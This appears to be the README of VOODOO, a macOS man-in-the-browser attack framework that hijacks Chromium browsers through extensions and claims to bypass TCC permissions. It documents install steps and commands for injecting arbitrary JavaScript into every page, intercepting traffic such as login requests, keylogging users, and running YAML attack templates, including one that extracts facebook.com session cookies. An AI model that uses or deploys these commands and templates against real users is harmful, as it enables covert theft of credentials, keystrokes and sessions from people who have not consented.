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Man in the Browser Framework


VOODOO is a Man in the browser attack framework for macOS. It comes with built-in keylogging, traffic monitoring, and scripting capabilities. VOODOO is highly extendable & shareable, it can execute YAML templates that define complex attacks.

Browser Support

IE / Edge
macOS only macOS only macOS only macOS only macOS only




In macOS traffic interception and keyloggers usually require TCC permissions, VOODOO bypass all of this by exploiting chromium based browsers extensions. VOODOO does not require root privileges or any TCC permissions to work.

Legal Disclaimer

Usage of this code for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.


  • 📜 Content Scripts - inject arbitrary JavaScript to any page
  • 🔍 Interceptor - capture browser traffic (url, headers, body, etc)
  • 🔑 Keylogger - records user keystrokes on any site
  • 📋 VOODOO Templates - run advance man in the browser attacks from template files

Quick start

$: sudo gem install get-voodoo


$: gem install get-voodoo --user-install

When installation without sudo make sure that /Users/[user]/.gem/ruby/[version]/bin is in your PATH.


$: git clone https://github.com/breakpointHQ/VOODOO.git
$: cd ./VOODOO
$: gem build ./voodoo.gemspec
$: gem install ./get-voodoo-X.X.X.gem


$: voodoo
  voodoo help [COMMAND]    # Describe available commands or one specific command
  voodoo intercept         # Intercept browser requests
  voodoo keylogger         # Records user keystrokes
  voodoo script <js/path>  # Add a content script
  voodoo template <path>   # Execute a VOODOO template
  voodoo version           # Prints voodoo version

Adding content script

$: voodoo help script
  voodoo script <js/path>

  x, [--urls=one two three]         
  f, [--format=FORMAT]              # pretty, json, payload, none
                                    # Default: pretty
  o, [--output=OUTPUT]              # File path
  p, [--params=key:value]           
  m, [--matches=one two three]      
                                    # Default: ["*://*/*"]
  b, [--browser=BROWSER]            
                                    # Default: chrome
  p, [--permissions=one two three]  

Add a content script

Execute JS on every page loaded on the Opera browser.

$: voodoo script "alert('Hello VOODOO!');" -b opera

Execute JS on every page matches https://example.com/*

$: voodoo script "alert('Example VOODOO!');" -b chrome -m "https://example.com/*"

Execute JS on every page loaded on Google Chrome, and open https://example.com.

$: voodoo script /tmp/myjs.js -b chrome -x "https://example.com"

Intercept browser traffic

$: voodoo help intercept
  voodoo intercept

  u, [--url-include=URL_INCLUDE]      
  i, [--body-include=BODY_INCLUDE]    
  h, [--header-exists=HEADER_EXISTS]  
  f, [--format=FORMAT]                # pretty, json, payload
                                      # Default: pretty
  o, [--output=OUTPUT]                # File path
  x, [--urls=one two three]           
  m, [--matches=one two three]        
                                      # Default: ["<all_urls>"]
  b, [--browser=BROWSER]              
                                      # Default: chrome

Intercept browser requests

Intercept all requests

$: voodoo intercept -o /tmp/requests_log.txt

Intercept all requests from Opera browser only when the url include /login.

$: voodoo intercept -o /tmp/requests_log.txt --url-include "/login"

Intercept all requests when the post body include @.

$: voodoo intercept -o /tmp/requests_log.txt --body-include "@"

Intercept all requests when the url matches https://example.com/* or https://example.net/*

$: voodoo intercept -m "https://example.com/*" "https://example.net/*"


$: voodoo help keylogger
  voodoo keylogger

  x, [--urls=one two three]     
  f, [--format=FORMAT]          # pretty, json, payload
                                # Default: pretty
  o, [--output=OUTPUT]          # File path
  m, [--matches=one two three]  
                                # Default: ["*://*/*"]
  b, [--browser=BROWSER]        
                                # Default: chrome

Records user keystrokes

Record user keys only when the url matches https://example.com/*

$: voodoo keylogger -m "https://example.com/*"


A VOODOO template is a YAML file that is used to define a man in the browser attack.

$: voodoo help template
  voodoo template <path>

  b, [--browser=BROWSER]     
  f, [--format=FORMAT]       # json, payload, none
                             # Default: none
  o, [--output=OUTPUT]       # File path
  x, [--urls=one two three]  
  p, [--params=key:value]    

Execute a VOODOO template

A template must have have 3 main blocks: info, scripts, and browser and 2 optional settings format and permissions.


The info block holds important information about your template. Info block provides name, author, and description. info block also supports dynamic fields, so you can define any key: value blocks to provide more useful information about the template.

Info block example:

  name: Change the Title of example.com
  author: Mr. Test
  description: Overwrite the contents of the h1 tag in example.com every time the user visits it.


The scripts block define the content scripts and background scripts that will be injected to the browser. You can spesify the following attributes for each script:

Name Type Description Default
matches array of strings Specifies which pages this content script will be injected into. *://*/*
content string Specifies the JavaScript code that will be executed nil
file string Specifies the path to a JavaScript file that will be executed nil
background boolean Specifies whether or not this is a background script false
communication boolean Specifies whether a collector server should be spawned for this script. true

Scripts block examples:

Inject a content script from a file to every page

  - matches: "*://*/*" # Inject to every page
    file: ./keylogger.js # A JS file from the same folder as the template file

Overwrite the title of example.com and example.net

  - matches:
      - https://example.com/*
      - https://example.net/*
    content: document.querySelector('h1').innerText = 'VOODOO Example!';

Inject a background script that will report back on every tab update.

  - content: chrome.tabs.onUpdated.addListener((_,tab) => VOODOO.send(tab));
    background: true

A template file looks like this:

  name: Change the Title of example.com
  author: Mr. Test
  description: Overwrite the contents of the h1 tag in example.com every time the user visits it.

  - matches: https://example.com/*
    content: document.querySelector('h1').innerText = "VOODOO Example";

  default: opera
    - https://example.net/
    - https://example.com/

JavaScript API

When communication is true, content and background scripts can access the VOODOO object which expose the following APIs.


Write data to the selected output format.

Name Type Description Default
data any the data you like to write to the selected output format. nil


Write information to stdout.

Name Type Description Default
str string the message you like to write to the VOODOO cli stdout nil


Stop the collector thread.

Name Type Description Default
options object addional configuration {}
options.close_browser boolean when set to true the browser process will be killed false

Dynamic Parameters

You can pass custom parameters to your template using the --params option, it accepts key value pairs in the following format name:john age:42. Those values could later be used in your script like that: %{name} %{age}.

You can see an example template that uses parameters at templates/cookie-monster.yaml.


The permissions property is used to declare the necessary permissions for your VOODOO script. By default VOODOO sets the following permissions: tabs, *://*/*, webRequest

Here is an example of a template that uses the cookies permission to extract facebook.com cookies.

  name: Cookie Monster

format: payload

  - cookies

  - content: |
      chrome.cookies.getAll({domain: "facebook.com"}, cookies => {
    background: true


The browser block is a key value object that defines browser related settings for the template. Please note, the name setting can be overwrited using the --browser or -b CLI option. The urls setting can also be overwrited using the --urls or -x CLI options.

Name Type Description Default
default string supported browser short name chrome, opera, edge, brave, chromium chrome
urls array of strings list of urls to open right after we hijack the browser. NULL


The format property sets the default output format for the template. Please note, this setting can be overwrited using the --format or -f CLI option.

  name: Title Spy
  description: Extract the title from any https site the user visits

format: payload

  - matches: https://*/*
    content: 'VOODOO.send({title: document.title})'

  default: opera

Ruby API

The underline Ruby API can also be used for advance integrations.

require 'voodoo'

browser = VOODOO::Browser.Chrome
                       # .Opera
                       # .Edge
                       # .Chromium

# Execute JS on example.com
browser.add_script(content: 'alert("VOODOO Example!");',
                   matches: 'https://example.com/*')

# Intercept all browser requests
browser.intercept do |event|
    req = event[:payload]
    puts "#{req[:method]} #{req[:url]}"

# Inject a keylogger to every page
browser.keylogger do |event|
    print event[:payload][:log]

# hijack the browser, and open example.com
browser.hijack 'https://example.com'


Running project tests

$: bundle exec rake test


  • File an issue first prior to submitting a PR!
  • If applicable, submit a test suite against your PR


  • Windows/Linux support
  • Ruby API documentation